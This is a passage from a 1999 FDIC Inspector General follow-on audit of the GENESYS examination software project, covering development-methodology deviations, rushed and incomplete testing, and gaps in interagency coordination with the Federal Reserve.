FOLLOW-ON AUDIT OF FDIC'S GENERAL EXAMINATION SYSTEM (GENESYS) DEVELOPMENT PROJECT

Audit Report No. 99-020
March 31, 1999

OFFICE OF AUDITS
OFFICE OF INSPECTOR GENERAL

TABLE OF CONTENTS

BACKGROUND
OBJECTIVES, SCOPE, AND METHODOLOGY
RESULTS OF AUDIT
GENESYS DID NOT FOLLOW THE FDIC'S STRUCTURED DEVELOPMENT METHODOLOGY
     Feasibility and Cost-Benefit of Alternative Solutions Not Evaluated
     Recommendations
     Use of Evolutionary Prototyping
     Recommendations
     GENESYS Testing Was Inefficient, Costly, and Not Always Effective
     Recommendation
BETTER INTERAGENCY COORDINATION NEEDED FOR FUTURE GENESYS AUTOMATION EFFORTS
     Recommendations
NEED FOR CONTINUITY OF EXAMINATION STAFF
     Recommendations
IMPROVED SAFEGUARDS NEEDED TO PROTECT CONFIDENTIAL BANK EXAMINATION DATA
     Recommendations
TRACKING AND REPORTING OF GENESYS COST-BENEFIT INFORMATION CAN BE IMPROVED
CORPORATION COMMENTS AND OIG EVALUATION
APPENDIX I - MEMORANDUM: CORPORATION COMMENTS
APPENDIX II - TABLE: MANAGEMENT RESPONSES TO RECOMMENDATIONS

Federal Deposit Insurance Corporation
Washington, D.C. 20434
Office of Audits
Office of Inspector General

DATE: March 31, 1999

TO: Donald C. Demitros, Director, Division of Information Resources Management and Chief Information Officer
    James Sexton, Director, Division of Supervision

FROM: David H. Loewenstein, Assistant Inspector General

SUBJECT: Report Entitled Follow-on Audit of FDIC's General Examination System Development Project (Audit Report No. 99-020)

The Federal Deposit Insurance Corporation (FDIC) Office of Inspector General (OIG) has completed a follow-on audit of the FDIC's General Examination System (GENESYS) development project. This follow-on audit focused on evaluating whether developers were adhering to the FDIC's system development policies and procedures. Prior to this audit, the OIG issued an audit report entitled Audit of the General Examination System (GENESYS) Development Project, dated June 5, 1997, that contained five findings and recommendations designed to improve the FDIC's system development practices relative to GENESYS.

Division of Information Resources Management (DIRM) and Division of Supervision (DOS) management had taken some steps to improve the development practices for GENESYS following our initial audit.
However, DIRM repeated its practice of performing detailed design and development work before user requirements had been completely defined or a project work plan had been formally approved. In addition, senior DIRM and DOS management approvals of the GENESYS project work plan, functional requirements document (FRD), and system design document came after significant investments had been made in development work. We also noted that despite significant changes in the project's scope, cost, and schedule that should have required a formal re-evaluation of alternatives, the FDIC continued with its initial plan without evaluating alternatives.

BACKGROUND

GENESYS represents the FDIC's most comprehensive initiative to apply technology to the bank safety and soundness examination process. GENESYS will replace the FDIC's Automated Report of Examination (C-ARE) and WordPerfect® templates used by DOS examiners to generate the Report of Examination (ROE). GENESYS is intended to improve the quality of the ROE and the efficiency of the report preparation process by leveraging time-saving and data integration features of Windows® 95 and Microsoft® Office 97 software. In addition, GENESYS permits the electronic capture and analysis of key bank safety and soundness examination information, such as Call Report and Uniform Bank Performance Report data.

Data analysis and query tools contained within GENESYS are intended to assist examiners in more effectively analyzing liquidity risk, interest rate risk, and other risks against which bank operations can be assessed. In addition, by expanding the amount of timely and relevant data available to examiners prior to on-site examinations, examiners will be better able to identify the specific risk areas that should be addressed during an examination.
GENESYS will also allow examiners to perform additional work off site and should facilitate the work that must be performed on site, thereby reducing the burden of examinations to the industry.

DIRM developed GENESYS using Microsoft Visual Basic® version 5.0 software and various add-on tools, including Formula One™ and First Impression®. Microsoft Access '97® was used to develop the GENESYS database, and Structured Query Language (SQL) program code was used to provide functionality to the GENESYS screens. GENESYS operates on a Pentium-based laptop computer.

The FDIC initiated the GENESYS project in December 1995. In January 1997, the Board of Governors of the Federal Reserve System (FRS) and the Conference of State Bank Supervisors (CSBS) joined the project as part of an interagency effort to develop a single bank safety and soundness examination system. Throughout the project, the FDIC's DIRM assumed the lead role in developing, testing, and implementing the system. DOS planned to use GENESYS on all new safety and soundness examinations when fully implemented. Approximately 30 state banking departments planned to begin using GENESYS with the FDIC in 1998, and the majority of the remaining state banking departments, along with FRS, planned to implement GENESYS in March 1999.

OBJECTIVES, SCOPE, AND METHODOLOGY

The objectives of the audit were to determine whether: (1) development was adhering to established and generally accepted System Development Life Cycle (SDLC) procedures, (2) requirements had been adequately defined and satisfied user needs, and (3) cost and benefit information had been adequately documented and tracked.
Because of the time-sensitive nature of the GENESYS development project, we met with DIRM and DOS personnel throughout the audit to discuss our preliminary recommendations.

To accomplish our audit objectives, we interviewed headquarters DIRM and DOS personnel as well as regional and field office bank examiners who were involved with the project. We also interviewed representatives of the U.S. General Accounting Office (GAO), FRS, CSBS, and the Alabama State Banking Department. In addition, we reviewed key SDLC deliverable products, including the GENESYS project work plan, FRD, and system design document. We also reviewed DIRM client information technology (IT) plans, contractor status reports, examiner training evaluation reports, and other key reports and documents prepared during the GENESYS development process. We also evaluated DIRM and DOS plans and activities relating to System Qualification Testing (SQT) and User Acceptance Testing (UAT) of GENESYS. Finally, we reviewed the FDIC's SDLC policies and procedures.

Our audit work was limited to the FDIC's development of version 1.0 of GENESYS. We did not review development plans or work relating to ongoing or planned GENESYS enhancements. We conducted our audit between September 1997 and October 1998 in accordance with generally accepted government auditing standards.

RESULTS OF AUDIT

Although DIRM and DOS management had taken some steps to improve the development practices for GENESYS following our initial audit, GENESYS development practices continued to deviate from the structured approach prescribed by the FDIC's SDLC process. Specifically, DIRM employed an evolutionary prototyping process to develop GENESYS wherein development work was performed before requirements definition and design work were substantially complete.
DIRM also initiated a SQT of GENESYS before system development and integration testing had been completed. In addition, DIRM deviated from the FDIC's SDLC process by not evaluating the feasibility or cost-benefit of alternative solutions to the development of GENESYS or finalizing critical SDLC deliverables and obtaining senior management approvals prior to initiating subsequent SDLC phases.

DIRM decided to deviate from the FDIC's prescribed SDLC procedures in an attempt to meet an aggressive development schedule for GENESYS. However, these deviations caused several inefficiencies in the GENESYS development process and required the FDIC to assume unnecessary risk. For example, ongoing changes to the functionality of GENESYS during the SQT process required testers to continually revalidate and update test procedures and ultimately prevented the testers from completing a SQT for GENESYS. DIRM also experienced inefficiencies and delays in the testing process by providing SQT testers with outdated GENESYS design specifications. This resulted in the development of erroneous test procedures that had to be revised or eliminated during the SQT process. Inadequate system qualification testing also allowed security weaknesses and numerous software bugs in GENESYS to go undetected until after DIRM and DOS began training the FDIC and state examiners on use of the software.

Examiners that we spoke with during our audit field work stated that GENESYS would generally satisfy their requirements for generating a safety and soundness ROE. However, feedback from examiners following GENESYS training indicated that the software contained numerous programming bugs and was not ready for training or production implementation when the FDIC initiated its national training on the system.
In our opinion, DIRM and DOS could have limited their risk by postponing GENESYS training and implementation until the software had been thoroughly tested and the programming bugs corrected.

In addition, we observed that there was no formal agreement between the FDIC and FRS regarding resources to satisfy unique FRS requirements. The FDIC assumed unnecessary risk by performing detailed design and development work without any formal FRS approvals of the GENESYS project work plan, FRD, or system design document. A less-than-expected level of FRS examiner support during the GENESYS design phase and FRS' decision to temporarily withdraw from the project on two separate occasions, in May 1997 and November 1997, caused inefficiencies during the development process and contributed to delays to the project schedule. We believe that the FDIC can improve its interagency coordination on the many planned enhancements to GENESYS by formalizing up-front interagency development agreements and adhering more closely to generally accepted SDLC procedures.

Significant turnover of DOS examiners assigned to the project impeded both requirements definition and design and resulted in unnecessary delays to the GENESYS development schedule. In addition, we found that GENESYS security features that were designed to prevent the unauthorized disclosure of confidential bank examination information needed to be improved. Finally, we found that there was a need to track and report more complete and up-to-date cost-benefit information on GENESYS throughout its life cycle.

Prior OIG audit reports have identified repeated instances where DIRM has deviated from the structured development approach required by the FDIC's SDLC process.
For example, in our review of the FDIC's Time and Attendance Processing System (TAPS) development project, we noted that DIRM and Division of Administration (DOA) management did not formally evaluate the feasibility or cost-benefit of alternative solutions to TAPS. In addition, DIRM and DOA proceeded with design and development work before fully defining user requirements. We also noted that TAPS suffered from a high turnover of project staff.

Reports and guidelines issued in past years by such organizations as GAO and the Office of Management and Budget (OMB) have identified similar causes for unsuccessful IT and systems development efforts. These causes include an inadequate evaluation of system alternatives, lack of senior management involvement, incomplete knowledge of customer needs, and turnover of key project staff. Because the referenced SDLC deviations continue to recur on DIRM's SDLC projects, we are re-addressing several recommendations to DIRM that have been made in past OIG audit reports. In addition, we are making several new recommendations to improve DIRM's development practices on future IT initiatives.

GENESYS DID NOT FOLLOW THE FDIC'S STRUCTURED DEVELOPMENT METHODOLOGY

DIRM and DOS management had taken some steps to improve the development practices for GENESYS following our initial audit. For example, DIRM assigned a quality assurance specialist to GENESYS and DOS improved the documentation of GENESYS requirements. However, GENESYS development practices continued to deviate from the structured approach required by the FDIC's SDLC process.
Specifically, DIRM deviated from the FDIC's SDLC process by (1) not evaluating the feasibility or cost-benefit of alternative solutions to the development of GENESYS, (2) using an evolutionary prototyping methodology wherein development work was performed before requirements definition and design work were substantially complete, and (3) not finalizing critical SDLC deliverables and obtaining formal senior management approvals prior to making significant investments in subsequent SDLC phases.

DIRM decided to deviate from the FDIC's prescribed SDLC procedures in an attempt to meet an aggressive development schedule for GENESYS. However, these deviations caused several inefficiencies in the GENESYS development process and exposed the project to unnecessary risk. For example, DIRM's decision to deviate from the phased testing procedures prescribed by the FDIC's SDLC process resulted in a testing process that was ineffective, costly, and in some cases, redundant.

DIRM initiated a SQT of GENESYS before the system had been completely developed. Ongoing development of GENESYS during the SQT process prevented testers from finalizing a SQT plan and required ongoing revalidation and updating of SQT procedures to ensure that new or modified functionality that was being built into GENESYS would be properly tested. In addition, outdated GENESYS design specifications provided to the SQT testers prior to the start of SQT resulted in the development of many erroneous test procedures that subsequently had to be revised or eliminated. We noted that the FDIC paid a contractor $491,037 to perform the SQT.

We advised DIRM and DOS officials of the risks associated with performing a SQT before development and integration testing was completed. However, the DIRM and DOS officials indicated that they recognized the risks of performing concurrent testing and proceeded with the SQT.
The lack of a fully integrated GENESYS system prevented testers from completing a SQT for GENESYS. Inadequate system qualification testing also allowed security weaknesses and numerous software bugs in GENESYS to go undetected until after DIRM and DOS began training the FDIC and state examiners on use of the software.

Examiners that we spoke with during our audit field work stated that GENESYS would generally satisfy their requirements for generating a safety and soundness report of examination. However, feedback from examiners following GENESYS training indicated that the software contained numerous programming bugs and was not ready for training or production implementation when the FDIC initiated its national training on the system in August 1998. In our opinion, DIRM should have delayed GENESYS training and implementation until the software had been thoroughly tested and the programming bugs corrected. Initial impressions of a new software product are lasting ones and can have a significant impact on acceptance of the software within the user community. Given the complexity of the GENESYS software, DIRM could have further limited the risk of an unsuccessful implementation by ensuring that programming bugs were corrected before examiners were trained on the system.

Feasibility and Cost-Benefit of Alternative Solutions Not Evaluated

Earlier in the GENESYS development process, DIRM and DOS did not formally evaluate the feasibility or cost-benefit of alternative solutions to GENESYS. DIRM and DOS developed an analysis of the projected costs and benefits of developing GENESYS in September 1996. DIRM also maintained and reported annual cost data throughout most of the project's life cycle as changes occurred in the project's scope. However, the September 1996 analysis did not address alternative solutions.
Additionally, despite significant changes in the project's scope, cost, and schedule in January 1997 that should have required a formal re-evaluation of alternatives, the FDIC continued with its initial plan to develop an in-house system without formally evaluating alternatives.

Although DIRM officials informed us that they informally considered alternatives to GENESYS, they did not formally evaluate or document the cost-benefit of alternative solutions because they did not consider it necessary to do so. DIRM and DOS also did not provide senior management with information that compared actual project cost, schedule, and scope to original projections.

FRS raised concern about the need to evaluate alternative solutions to GENESYS in April 1997 and cited this as one of its reasons for a less than full commitment to the project at that time. Alternative solutions should be considered up front during the project planning phase of a system initiative. Also, when major changes occur that affect the project's cost, scope, risks, or timeframes for implementation, alternative solutions should be revisited in order to validate the approach being followed.

The purpose of a feasibility study is to provide senior management with: (1) an analysis of the project's objectives, requirements, and system concepts; (2) an evaluation of alternative approaches; and (3) a recommended approach. The purpose of a cost-benefit analysis (CBA) is to provide management with adequate cost and benefit information to analyze and evaluate alternative approaches. A CBA should help to determine whether commercial off-the-shelf software is available to address project requirements or whether other technical and functional alternatives, such as enhancing or re-engineering existing systems or modifying an existing system developed by another federal entity, are feasible.
Because the structures of feasibility studies and CBAs are so similar, the FDIC's SDLC Manual allows them to be combined.

The FDIC's SDLC Manual requires a feasibility study and CBA to be completed for major IT projects before committing full life cycle resources. Federal guidelines also stress the importance of feasibility studies and CBAs. For example, Evaluating Information Technology Investments, a practical guide issued jointly by OMB and GAO in November 1995, recommends that management evaluate the cost-benefits and risks of IT projects before making significant investments in those projects. Changes proposed by DIRM to the FDIC's SDLC Manual would require that CBAs be updated and approved when significant changes occur in a project's scope, estimated resources, or timeframes. Updating CBAs throughout a project's life cycle is consistent with sound business practices and guidelines, including OMB Circular A-130, which prescribes that CBAs be refreshed throughout the life cycle process with up-to-date information to ensure the continued viability of systems prior to and during implementation.

In a subsequent section of this report, we identify opportunities for DIRM and DOS to improve the tracking and reporting of GENESYS cost and benefit information. Tracking accurate, current, and complete life cycle cost data is critical to measuring performance and making cost-effective decisions on complex IT investments. Full life cycle cost data is also essential for evaluating alternatives when significant changes occur in an IT project's cost, scope, or schedule.
In addition, without current and up-to-date cost-benefit information, DIRM is unable to conduct effective post-implementation reviews to validate estimated benefits and document effective management practices for broader use.

Recommendations

We recommend that the Director, Division of Information Resources Management:

(1) Formally evaluate and document the feasibility and cost-benefit of alternative solutions for systems development projects, including major enhancements to GENESYS, using the guidelines in the FDIC's SDLC Manual before committing significant life cycle resources to a particular alternative.

(2) Revisit alternative solutions when significant scope, cost, risk, or schedule changes occur on future information technology projects.

(3) Revise the FDIC's SDLC Manual to require that, as significant changes occur in a project's scope, risk, estimated resources, or timeframes, these changes be approved by the IT Council.

Use of Evolutionary Prototyping

DIRM employed an evolutionary prototyping methodology to develop GENESYS that significantly deviated from the phased development methodology prescribed by the FDIC's SDLC process. The evolutionary prototyping methodology used for GENESYS was one in which development work was performed before requirements definition and design work were substantially complete. DIRM's development approach also involved initiating a SQT of GENESYS before system development and integration testing had been completed. In addition, although the GENESYS project team had developed several draft versions of critical SDLC deliverable products, these deliverables were not approved by senior management before significant investments had been made in subsequent life cycle phases.
The FDIC's SDLC process requires that critical SDLC deliverable products be approved by senior management before making significant investments in subsequent life cycle phases. DIRM decided to deviate from the FDIC's prescribed SDLC process in an attempt to meet an aggressive development schedule for GENESYS. However, these deviations caused several inefficiencies in the GENESYS development process and required the FDIC to assume unnecessary risk.

We spoke with members of the GENESYS development team and learned that the phased development approach prescribed by the FDIC's SDLC process was not being followed because of the amount of time required to complete work in one phase before proceeding with work in a subsequent phase. The GENESYS developers adopted a streamlined development process for GENESYS in an attempt to meet an aggressive development schedule for the project. The GENESYS project work plan states: "This project is schedule-driven; the highest priority identified is to deliver a product on time. Therefore, risk areas that adversely impact project schedule will be given the highest priority. Other risk areas, such as product content and quality, and project cost, will be considered secondary."

The evolutionary prototyping methodology used to develop GENESYS was one in which programmers periodically met with examiners to present specific screens and demonstrate functionality. Some program code was developed as part of this process to display information on the screen and demonstrate functionality. Based on their meetings with the examiners, the programmers made adjustments and enhancements to the GENESYS screens. Code reviews were also performed to ensure that detailed design and development work adhered to agreed upon standards.
This process was repeated until the user was satisfied with the functionality of the screen. Once the user was satisfied, the DIRM and program office project managers formally approved the requirements and design of the screen and any coding work remaining for the screen was completed. The prototype screen was then integrated into a working version of the application and later tested in preparation for production implementation.

The FDIC's SDLC Manual describes a prototyping technique that can be used by system developers for requirements gathering or for proof-of-concept purposes. According to the FDIC's SDLC methodology, a prototype of the proposed system is developed based on user requirements and refined based on user input. Once the user is satisfied that the prototype has the required features, the prototype requirements are documented in a FRD and design continues in the traditional, phased manner. The prototyping methodology described in the FDIC's SDLC Manual has been advocated as a useful software engineering tool because it lends itself to intense interaction between users and developers, resulting in early validation of requirements. Validation of requirements early in a system's life cycle development is important because failure to validate requirements can result in frequent and expensive changes in later life cycle phases.

While it may be necessary to perform a certain level of design and development work to produce a working model or prototype, the design and development work performed on GENESYS was more extensive for some business functions than required to validate user requirements and elicit feedback on the look and feel of the user interface.
For example, programmers were developing and testing program code for GENESYS screen functionality, performing detailed design and development work on the GENESYS database, and developing program code to populate tables in certain GENESYS modules.

GENESYS design and development work was performed before required SDLC deliverable products had been approved. We noted that DIRM and DOS had invested significant corporate resources in the GENESYS project before obtaining senior DIRM and DOS management approval of a FRD or project work plan describing the scope, resources, and time schedules required to develop the system. The FDIC's SDLC Manual prescribes that a project work plan and FRD be completed and approved before proceeding with detailed design and development work.

We believe that DIRM's use of evolutionary prototyping to develop GENESYS caused certain inefficiencies in the GENESYS development process and required the FDIC to assume unnecessary risk. For example, in the following section of this report, we explain that DIRM lost valuable resources by proceeding with a SQT of GENESYS before system development and integration testing had been completed. The FDIC's SDLC Manual prescribes a phased approach for systems development wherein development is completed before testing begins.
In addition, a major risk in developing significant functionality into a prototype is that if business requirements change or do not receive management approval, the investment in the design and development of prototype modules may not benefit the project or the Corporation.

DIRM's use of evolutionary prototyping also made the project sensitive to personnel turnover. DIRM relied on extensive developer/user interaction to build requirements and design into a working software prototype while placing less emphasis on maintaining up-to-date requirements and design documentation than prescribed by the FDIC's SDLC process. As a result, as examiners left the GENESYS project, so did much of the knowledge and rationale underlying why decisions relating to GENESYS requirements and design were made. Although DOS examination staff improved GENESYS user documentation during late 1997 and early 1998, in part to mitigate the impact of examiner departures, temporary assignments of examination staff to the GENESYS project continued through the close of our audit field work.

In our opinion, the evolutionary prototyping methodology used to develop GENESYS should not be used on the FDIC's large, complex systems initiatives, such as GENESYS. In addition, we believe that prototyping techniques should be strictly limited to the requirements gathering phase of IT projects as prescribed by the FDIC's SDLC Manual. Evolutionary prototyping that extends beyond the requirements definition phase, similar to the methodology used on GENESYS, may be useful on the FDIC's small, non-complex systems initiatives that involve short development schedules. If DIRM determines that an evolutionary prototyping methodology similar to the one used on GENESYS is appropriate for select, small-scale IT initiatives, then the FDIC's SDLC Manual should be amended to describe the evolutionary prototyping methodology that will be used.
The Manual should also include specific criteria for determining when an evolutionary prototyping methodology such as the one used for GENESYS is appropriate. The criteria restricting when this method can be used should address the estimated life cycle cost of the system, time frames for development, project complexity, scope, and risk.

Recommendations

We recommend that the Director, Division of Information Resources Management:

(4) Require the GENESYS development team to follow the phased development process prescribed by the FDIC's SDLC Manual for systems development projects, including any major enhancements to GENESYS.

(5) Determine whether evolutionary prototyping could benefit the FDIC's small, non-complex systems initiatives that involve short development schedules. If DIRM determines that evolutionary prototyping is appropriate for select, small-scale IT initiatives, then the FDIC's SDLC Manual should be amended to describe the type of methodology that will be used and specific criteria governing its use.

GENESYS Testing Was Inefficient, Costly, and Not Always Effective

DIRM did not follow an efficient or effective method of testing GENESYS prior to its implementation. As a result, valuable system development resources may have been wasted. For example, developers initiated a SQT of GENESYS before system development and integration testing was completed. Although the FDIC paid a contractor $491,037 to perform a SQT for GENESYS, ongoing changes to the functionality of GENESYS during the SQT process required testers to continually revalidate and update test procedures. As a result, the SQT was not completed.

DIRM experienced additional inefficiencies in the SQT process by providing testers with outdated GENESYS design specifications.
This resulted in the development of erroneous test procedures that\nhad to be revised or eliminated during the SQT process. A lack of effective communication and\ncoordination between the SQT testers and members of the GENESYS development and examination\nteams during the SQT process exacerbated the SQT shortcomings. Inadequate system qualification\ntesting allowed security weaknesses and numerous software bugs in GENESYS to go undetected\nuntil after DIRM and DOS began training the FDIC and state examiners on the software.\n\nDIRM assumed additional risk during the testing process by performing a SQT, user acceptance test\n(UAT), and pilot test of GENESYS concurrently. DIRM deviated from the phased testing approach\nprescribed by the FDIC\'s SDLC process in an attempt to meet an aggressive development schedule\nfor GENESYS. We advised DIRM and DOS officials of the risks associated with parallel testing in\nwriting via an e-mail that was sent on May 1, 1998. We also met with DIRM and DOS officials on\nMay 8, 1998 to discuss our concerns regarding parallel testing in greater detail. However, DIRM\nand DOS officials indicated that they recognized the risks of performing parallel testing and\nproceeded with the SQT, UAT, and pilot tests of GENESYS as planned.\n\nIn September 1997, FDIC awarded a contract to provide Independent Verification and Validation\n(IV&V) technical support to the GENESYS project. The contract was valued at $622,149 and ran\nthrough December 31, 1998. The contract required the IV&V contractor to analyze the GENESYS\nfunctional requirements and design, prepare a SQT plan and related test procedures, conduct a SQT,\nand report the results to DIRM. The GENESYS SQT was intended to consist of three 2-week test\ncycles. The first SQT cycle was intended to validate whether the GENESYS functional requirements\nwere met, ensure that all system capabilities functioned as designed, and ensure that the GENESYS\nuser guide was adequate. 
The second SQT cycle was intended to focus on exception testing to\ndetermine how GENESYS would handle abnormal conditions and error processing. The third SQT\ncycle was intended to repeat the first two SQT cycles using a different set of input data to ensure that\nthere were no data dependencies within the system.\n\nThe IV&V contractor developed its initial test procedures based on a review of the approved\nGENESYS FRD and system design document. However, many of the requirements and design\nspecifications contained within these documents had not been updated to reflect changes that had\n\n                                                  11\n\x0cbeen made to the software\'s functionality pursuant to the evolutionary prototyping process that\nDIRM was using to develop GENESYS. As a result, many of the test procedures that the contractor\ndeveloped were erroneous or inaccurate and had to be revised and revalidated. A lack of effective\ncommunication and coordination between the SQT testers and members of the GENESYS\ndevelopment and examination teams during the SQT process prevented the testers from identifying\nerroneous test procedures. Resources devoted to identifying and revising erroneous test procedures\nintroduced significant inefficiencies to the GENESYS testing process.\n\nThe contractor initiated the first SQT cycle of GENESYS on January 20, 1998. However, the lack\nof a fully integrated GENESYS system and the development of erroneous test procedures referenced\nabove impeded the testing process. We noted that the IV&V contractor was only able to\nsuccessfully execute approximately 14 percent (66 of 471) of the test procedures that had been\nprepared for the first SQT cycle of GENESYS. We also noted that the contractor developed 344\nfindings as a result of the first 2-week SQT cycle for GENESYS. 
The contractor testers cited the\nlack of a GENESYS user guide, the lack of documentation that explained proper operation of the\nsystem, and an incomplete GENESYS data dictionary as further impediments to the SQT process.\n\nOngoing changes to the functionality of GENESYS during the SQT process introduced additional\ninefficiencies by requiring testers to continually revalidate and update test procedures. In an effort to\naddress this impediment, contractor testers were directed by DIRM on February 3, 1998 to modify\ntheir test procedures based on input from the DOS examiners. Contractor testers were also directed\nto contact the examiners whenever differences were noted between the GENESYS software and\ndocumented requirements and design. During their discussions with examiners, the contractor\ntesters identified new GENESYS requirements and functionality that had been neither documented\nnor coded into the GENESYS software. The examiners indicated that many of these new\nrequirements were needed for an initial release of GENESYS. These new requirements were\nprovided to the GENESYS developers for programming and incorporation into the application.\n\nAlthough the GENESYS SQT process was scheduled to be completed within 6 weeks of its\ninitiation, SQT testing activities continued for 17 weeks and were not completed. In May 1998,\nDIRM discontinued the GENESYS SQT and directed the IV&V contractor to prepare a test analysis\nreport. The SQT test analysis report, dated June 8, 1998 states: "At the time of this report a fully\nintegrated system has not been made available. The testing conducted by the IV&V team might\nmore appropriately be referred to as a combination of unit and integration testing." The test analysis\nreport recommended that the DIRM project manager for GENESYS complete unit and integration\ntesting of the software and then subject the system to a formal SQT. 
However, at the close of our\nfield work, a formal SQT, as defined by the FDIC\'s SDLC Manual, had not been performed for\nGENESYS.\n\nThe purpose of a SQT is to validate that functional requirements are satisfied by the developed\nsystem and that there are no adverse effects on the overall process or other existing systems. The\nFDIC\'s SDLC Manual describes a SQT as "a comprehensive verification and validation process\nconducted to ensure that all capabilities and requirements of the system are exercised under both\nnormal and stress conditions." SQT procedures cover all facets of a newly developed system,\nincluding screen functionality, database updates, user documentation, and security. In addition, there\n\n                                                  12\n\x0care certain pre-requisites for conducting an effective SQT. These include a fully integrated software\nsystem and completion of unit and integration testing.\n\nThe lack of a formal SQT for GENESYS allowed security weaknesses and numerous software bugs\nin GENESYS to go undetected until after DIRM and DOS began training the FDIC and state\nexaminers on the software. Feedback from examiner training evaluation forms indicated that\nGENESYS was not ready for training or production implementation when DIRM and DOS initiated\nGENESYS training in August 1998 because the software contained run-time errors and numerous\nprogramming bugs. Some examiners suggested in their training evaluation forms that the\nimplementation of GENESYS should be delayed to address the programming bugs that were\nidentified during their training sessions.\n\nIn our opinion, DIRM should have delayed GENESYS training and implementation until the\nsoftware had been thoroughly tested. Emphasis on meeting the GENESYS development schedule\nshould not have obviated requirements to follow prescribed SDLC procedures. 
Initial impressions of\na new software product are lasting ones and can have a significant impact on acceptance of the\nsoftware within the user community. Training examiners on a software product that has not been\ncompletely tested and still had errors in it presented unnecessary risk to the successful\nimplementation of GENESYS.\n\nDIRM assumed additional risk by deviating from the phased testing approach prescribed by the\nFDIC\'s SDLC process. Specifically, DIRM performed a SQT, UAT, and pilot test of GENESYS in\nparallel. DIRM deviated from the phased testing approach prescribed by the FDIC\'s SDLC process\nin an attempt to meet an aggressive development schedule for GENESYS. However, the FDIC\'s\nSDLC Manual states that the SQT, UAT, and pilot tests are to be performed in a phased manner,\nstarting with the SQT. The SDLC Manual also states that the UAT is the final test of the system and\nthe SQT should be completed before the system is delivered to the UAT team.\n\nPhased testing, as described in the FDIC\'s SDLC Manual, is designed to prevent the inefficiencies\nthat are inherent in parallel testing, such as SQT and UAT testers performing identical test\nprocedures on the same piece of software. In addition, because a SQT had not been completed for\nGENESYS, UAT testers experienced software problems that should have been identified and\ncorrected during the SQT. Although a phased testing approach would most likely have required an\nextension to the GENESYS delivery date, potential efficiencies could have been significant.\n\nWe advised DIRM and DOS officials of the risks associated with concurrent testing on May 1, 1998.\nWe pointed out that the FDIC\'s SDLC Manual prescribes a phased testing approach for newly\ndeveloped systems and that a phased approach would help to ensure a successful implementation of\nGENESYS and acceptance within the user community. 
We also indicated that, in our opinion, there\nwas unnecessary risk in proceeding with a pilot test of GENESYS, then scheduled to begin May 11,\n1998, without first completing the SQT, followed by the UAT. Despite the concerns expressed by\nour office, DIRM and DOS officials indicated that they recognized the risks of performing\nconcurrent tests and proceeded with the SQT, UAT, and pilot tests as planned.\n\n\n\n                                                 13\n\x0cRecommendation\n\nWe recommend that the Director, Division of Information Resources Management:\n\n(6)    Follow the phased testing approach prescribed by the FDIC\'s SDLC Manual for all future\n       systems development projects and enhancements to existing systems.\n\n\nBETTER INTERAGENCY COORDINATION NEEDED FOR FUTURE GENESYS\nAUTOMATION EFFORTS\n\nAlthough the FDIC and FRS entered into a memorandum of understanding (MOU) establishing a\nsound framework for the development of GENESYS, a lack of adherence to the MOU caused\ninefficiencies and delays in the development process. Specifically, senior FDIC and FRS\nmanagement did not formally approve a project work plan or other agreement defining the\nresponsibilities of each agency on the project or the time and resources to be committed by each\nagency to GENESYS. We noted that the referenced MOU provided for the joint development and\napproval of a project work plan for GENESYS. Generally accepted SDLC principles also require a\nproject work plan to be completed and approved before investing significant resources in life cycle\ndevelopment. The lack of an approved project work plan contributed to delays and inefficiencies\nduring the GENESYS design phase when FRS provided a less than expected level of examiner\nsupport and temporarily withdrew from the project. 
Additional delays and inefficiencies were\nexperienced during the development phase when FRS temporarily withdrew from the GENESYS\nproject for a second time.\n\nThe FDIC also assumed unnecessary risk by proceeding with detailed design and development of\nFRS-specific requirements for GENESYS without FRS approvals of a project work plan, FRD or\nsystem design document. Although senior FDIC and FRS management were generally aware of the\nproject\'s scope and objectives through high level briefings, generally accepted SDLC procedures\nrequire that critical SDLC deliverable products be completed and formally approved by key project\nparticipants before making significant investments in subsequent life cycle phases. We believe that\nthe FDIC can improve its interagency coordination on the many planned enhancements to\nGENESYS by formalizing up-front interagency development agreements and adhering more closely\nto generally accepted SDLC procedures.\n\nIn January 1997, the FDIC and FRS entered into a MOU establishing a framework for the\ndevelopment of an interagency bank safety and soundness examination system. The agreement\nestablished an interagency task force comprised of FDIC, FRS, and state examiners for the purposes\nof (1) specifying a set of joint requirements for the system, (2) estimating the time and resources\nrequired to develop the system, and (3) proposing a development approach. The agreement also\nprovided for regular involvement of senior FDIC and FRS management. 
Specifically, the MOU\nstated: \xe2\x80\x9cFinal approval of all work products and recommendations of the examination team and IS\nsupport staff will be granted jointly by the FRS Director of Bank Supervision and Regulation and the\nFDIC Director of Supervision within two weeks of submission of project deliverables.\xe2\x80\x9d\n\n\n                                                14\n\x0cIn May 1997, the FDIC\'s DIRM and DOS completed a draft project work plan that contained a\nproposed approach for developing GENESYS and an estimate of the time and resources that the\nFDIC would dedicate to the development effort. However, the project work plan did not address the\ntasks or responsibilities of other agencies involved with the project, such as FRS or CSBS. The draft\nproject work plan also did not address the resource commitments that those agencies would make to\nthe project. Although the draft project work plan was subsequently approved by senior FDIC\nmanagement, it was never approved by FRS management. We spoke with representatives of FRS\nand CSBS and learned that their agencies did not develop separate project work plans for\nGENESYS. The FRS and CSBS representatives informed us that they were relying on the FDIC to\nplan for the development of GENESYS.\n\nIn addition, no effort was made to quantify the level or source of resources that would be needed to\naddress FRS-specific requirements that were not related to the FDIC\'s safety and soundness\nexamination responsibilities. We noted that the FDIC was providing programming resources to\nsatisfy FRS specific requirements and that the FDIC had made informal commitments to provide\nresources for FRS examiner training and software maintenance. 
In our opinion, DIRM and DOS\nmanagement should obtain FDIC Board of Director approval prior to investing significant FDIC\nresources to satisfy non-FDIC requirements.\n\nAccording to the FDIC\'s SDLC Manual, the purpose of a project work plan is to formally capture\nand document agreements among project participants regarding project scope, tasks, schedule,\nallocated resources, and interrelationships with other projects. The Manual states: "the Project\nWork Plan will make clear the responsibility and accountability of the various parties." By securing\nan informed agreement up-front, and revisiting the agreement throughout the project\'s life cycle,\ndevelopers can better prevent cost and schedule overruns and ensure that the project will meet\nexpected results. Obtaining formal, senior management approval of a project work plan also ensures\nthat management has the information necessary to make informed decisions on the project and that\nchanges in the project\'s scope, costs, and time schedules are adequately controlled.\n\nIn May 1997, the interagency task force completed a high level, 6-page requirements analysis for\nGENESYS. The analysis was approved by FDIC, FRS, and CSBS project managers for\nGENESYS. However, the analysis was not formally approved by senior FDIC and FRS\nmanagement as required by the interagency MOU. Senior FDIC management approved a more\ndetailed GENESYS FRD and system design document in August 1997 and October 1997,\nrespectively. However, these documents were not approved by FRS management, as required by the\nMOU and generally accepted SDLC principles.\n\nThe FDIC\'s SDLC Manual states that user requirements must be defined, documented, and approved\nin a FRD before making significant investments in detailed 